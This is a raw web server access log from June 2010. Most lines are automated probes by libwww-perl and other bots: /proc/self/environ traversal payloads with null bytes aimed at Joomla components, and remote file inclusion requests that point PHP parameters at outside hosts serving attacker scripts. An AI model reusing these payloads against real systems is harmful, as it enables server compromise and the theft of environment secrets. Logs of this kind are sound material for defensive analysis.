205.234.231.180 - - [23/Jun/2010:00:18:56 -0400] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.831"
217.31.58.188 - - [23/Jun/2010:00:19:02 -0400] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:19:03 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:19:03 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:19:09 -0400] "GET /logs/error_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
205.234.231.180 - - [23/Jun/2010:00:19:20 -0400] "GET /logs/access_log.Q110051900///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.831"
217.31.58.188 - - [23/Jun/2010:00:19:22 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
118.129.167.25 - - [23/Jun/2010:00:19:40 -0400] "GET /logs/access_log.Q109102300//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:19:41 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:19:42 -0400] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:20:19 -0400] "GET /logs/access_log.Q110050400//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
69.106.226.247 - - [23/Jun/2010:00:20:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
69.106.226.247 - - [23/Jun/2010:00:20:26 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
69.106.226.247 - - [23/Jun/2010:00:20:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
69.106.226.247 - - [23/Jun/2010:00:20:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)"
217.31.58.188 - - [23/Jun/2010:00:20:34 -0400] "GET /xmlrpc HTTP/1.1" 404 204 "-" "libwww-perl/5.805"
118.129.167.25 - - [23/Jun/2010:00:20:59 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
174.121.216.99 - - [23/Jun/2010:00:21:09 -0400] "GET /logs/error_log.Q110030800///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:21:10 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:21:11 -0400] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
209.59.12.99 - - [23/Jun/2010:00:21:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.129.167.25 - - [23/Jun/2010:00:21:32 -0400] "GET /logs/access_log.Q109090600//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:21:33 -0400] "GET /logs/access_log.Q109090600//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:21:33 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
174.121.216.99 - - [23/Jun/2010:00:21:34 -0400] "GET /logs/access_log.Q110051900///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.810"
118.129.167.25 - - [23/Jun/2010:00:21:34 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:21:35 -0400] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:21:35 -0400] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
174.121.216.99 - - [23/Jun/2010:00:21:53 -0400] "GET /logs/error_log.Q110030800///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:21:54 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:21:54 -0400] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
62.44.82.118 - - [23/Jun/2010:00:21:56 -0400] "GET /logs/access_log.Q110061100/?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
174.121.216.99 - - [23/Jun/2010:00:21:56 -0400] "GET /logs/error_log.Q110030800///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
62.44.82.118 - - [23/Jun/2010:00:21:56 -0400] "GET /?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
174.121.216.99 - - [23/Jun/2010:00:21:56 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:21:57 -0400] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
62.44.82.118 - - [23/Jun/2010:00:21:57 -0400] "GET /logs/?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
62.44.82.118 - - [23/Jun/2010:00:21:59 -0400] "GET /logs/access_log.Q110061300/?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
174.121.216.99 - - [23/Jun/2010:00:22:21 -0400] "GET /logs/access_log.Q110051900///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:22:23 -0400] "GET /logs/access_log.Q110051900///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.810"
94.247.178.153 - - [23/Jun/2010:00:22:25 -0400] "GET /logs/error_log.Q110050400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
118.129.167.25 - - [23/Jun/2010:00:22:34 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:22:34 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:22:52 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:22:53 -0400] "GET /logs/access_log.Q110051200//xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:22:54 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:22:54 -0400] "GET //xmlrpc.php HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:22:55 -0400] "GET /logs//xmlrpc.php HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:22:58 -0400] "GET /logs/access_log.Q110051200//xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:22:59 -0400] "GET //xmlrpc.php HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:23:00 -0400] "GET /logs//xmlrpc.php HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
67.159.44.97 - - [23/Jun/2010:00:23:52 -0400] "GET //admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:52 -0400] "GET /logs//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:52 -0400] "GET /logs/access_log.Q109060400%20%20//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:52 -0400] "GET /logs/access_log.Q110012000%20%20//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:53 -0400] "GET /logs//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:53 -0400] "GET /logs/access_log.Q109060400//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:53 -0400] "GET //admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:53 -0400] "GET /logs/access_log.Q110012000//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:56 -0400] "GET /logs//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:56 -0400] "GET //admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:59 -0400] "GET //admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:23:59 -0400] "GET /logs//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.71.73 - - [23/Jun/2010:00:24:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L22817E6C01B38400EF5B08Q+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.159.44.97 - - [23/Jun/2010:00:24:46 -0400] "GET //admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:24:46 -0400] "GET /logs//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:24:46 -0400] "GET /logs/access_log.Q109060400%20%20//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:24:46 -0400] "GET /logs/access_log.Q110012000%20%20//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.88.4.74 - - [23/Jun/2010:00:24:49 -0400] "GET /logs/access_log.Q109061100//xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:24:52 -0400] "GET /logs/access_log.Q109061100//xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
95.108.245.251 - - [23/Jun/2010:00:25:14 -0400] "GET /logs/access_log.Q109060500 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.159.44.97 - - [23/Jun/2010:00:25:21 -0400] "GET /logs/access_log.Q109060400//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:25:21 -0400] "GET /logs/access_log.Q110012000//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.181.7.113 - - [23/Jun/2010:00:25:39 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
118.129.167.25 - - [23/Jun/2010:00:25:54 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
67.159.44.97 - - [23/Jun/2010:00:25:56 -0400] "GET //admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:25:56 -0400] "GET /logs//admin.wmtportfolio.php?mosConfig_absolute_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.88.4.74 - - [23/Jun/2010:00:26:00 -0400] "GET /logs/error_log.Q109090800///xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:26:00 -0400] "GET /logs/error_log.Q109090800///xmlrpc.php HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:26:00 -0400] "GET ///xmlrpc.php HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:26:00 -0400] "GET ///xmlrpc.php HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:26:00 -0400] "GET /logs///xmlrpc.php HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:26:02 -0400] "GET /logs///xmlrpc.php HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:26:04 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
174.121.216.99 - - [23/Jun/2010:00:26:13 -0400] "GET /logs/error_log.Q110052100//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:26:13 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:26:13 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:26:50 -0400] "GET /logs/access_log.Q110052100//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.195.114.223 - - [23/Jun/2010:00:26:54 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.129.167.25 - - [23/Jun/2010:00:27:03 -0400] "GET /logs/access_log.Q110051500//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:27:04 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:27:04 -0400] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:27:17 -0400] "GET /logs/access_log.Q110051500//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:27:17 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:27:18 -0400] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
94.247.178.153 - - [23/Jun/2010:00:27:39 -0400] "GET /logs/access_log.Q110061100/?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
94.247.178.153 - - [23/Jun/2010:00:27:43 -0400] "GET /?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
94.247.178.153 - - [23/Jun/2010:00:27:45 -0400] "GET /logs/?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.805"
118.129.167.25 - - [23/Jun/2010:00:28:17 -0400] "GET /logs/error_log.Q110051500//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
118.129.167.25 - - [23/Jun/2010:00:28:18 -0400] "GET /logs/error_log.Q110051500//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
174.121.64.231 - - [23/Jun/2010:00:28:29 -0400] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
95.156.233.139 - - [23/Jun/2010:00:28:43 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
109.71.41.45 - - [23/Jun/2010:00:28:49 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
66.249.71.73 - - [23/Jun/2010:00:29:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LM238CA6F0F046500C6AC081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [23/Jun/2010:00:29:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.223 - - [23/Jun/2010:00:28:48 -0400] "GET /logs/access_log.Q109081300 HTTP/1.0" 200 5011500 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.64.231 - - [23/Jun/2010:00:30:26 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
174.121.64.231 - - [23/Jun/2010:00:30:26 -0400] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.64.231 - - [23/Jun/2010:00:30:27 -0400] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
149.31.6.24 - - [23/Jun/2010:00:30:53 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:30:53 -0400] "GET /logs/access_log.Q109100900//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:30:53 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.247.178.153 - - [23/Jun/2010:00:31:06 -0400] "GET /logs/access_log.Q110061300/?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
67.159.44.97 - - [23/Jun/2010:00:31:07 -0400] "GET //login.php?foing_root_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:31:07 -0400] "GET /logs//login.php?foing_root_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.159.44.97 - - [23/Jun/2010:00:31:07 -0400] "GET /logs/access_log.Q109123000%20%20//login.php?foing_root_path=http://montreal.servershost.net/~sumnalo//skins/sumnal/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
95.156.233.139 - - [23/Jun/2010:00:31:46 -0400] "GET /logs/access_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:31:46 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
95.156.233.139 - - [23/Jun/2010:00:31:47 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
66.71.245.122 - - [23/Jun/2010:00:32:10 -0400] "GET /logs/error_log.Q109111100////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
109.71.41.45 - - [23/Jun/2010:00:32:38 -0400] "GET /logs/access_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:32:38 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
109.71.41.45 - - [23/Jun/2010:00:32:38 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
68.109.233.150 - - [23/Jun/2010:00:32:53 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
95.108.245.251 - - [23/Jun/2010:00:33:04 -0400] "GET /logs/error_log.Q109073000 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
95.156.233.139 - - [23/Jun/2010:00:33:16 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
